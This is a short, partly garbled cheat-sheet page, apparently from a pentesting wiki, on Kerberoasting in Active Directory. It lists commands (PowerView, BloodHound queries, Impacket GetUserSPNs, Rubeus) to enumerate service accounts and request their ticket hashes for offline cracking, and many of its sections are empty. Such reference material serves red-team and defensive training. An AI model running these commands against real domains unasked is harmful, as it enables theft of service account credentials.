Kerberoasting
Kerberoasting
Get kerberoastable users
Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalNameMATCH (u:User {hasspn:true}) RETURN u
MATCH (u:User {hasspn:true}), (c:Computer),p=shortestPath((u)-[*1..]->(c)) RETURN p Get hash (TGS)
Impacket-GetUserSPNs -request -dc-ip DC_IP DOMAIN/USER:PASSWORD
Rubeus kerberoastAllows a user to request a service ticket for any service with a registered SPN then use that ticket to crack the service password.
Tools: Bloodhound, Invoke-Kerberoast.ps1, Kekeo, Rubeus, Hashcat
Steps:
Do Kerberoasting
Windows
1) Rubeus (Binary)
2) Rubeus (Powershell)
3) Invoke-Kerberoast
Linux
1) Impacket GetUserSPNs
Kerberoasting
Command
Description
Kerberoasting without domain account
Linux
Windows
Kerberoastable users enumeration
Windows
Linux (Metaploit, Impacket, https://github.com/skelsec/kerberoast)
Targeted Kerberoasting
Github repo: https://github.com/ShutdownRepo/targetedKerberoast
Last updated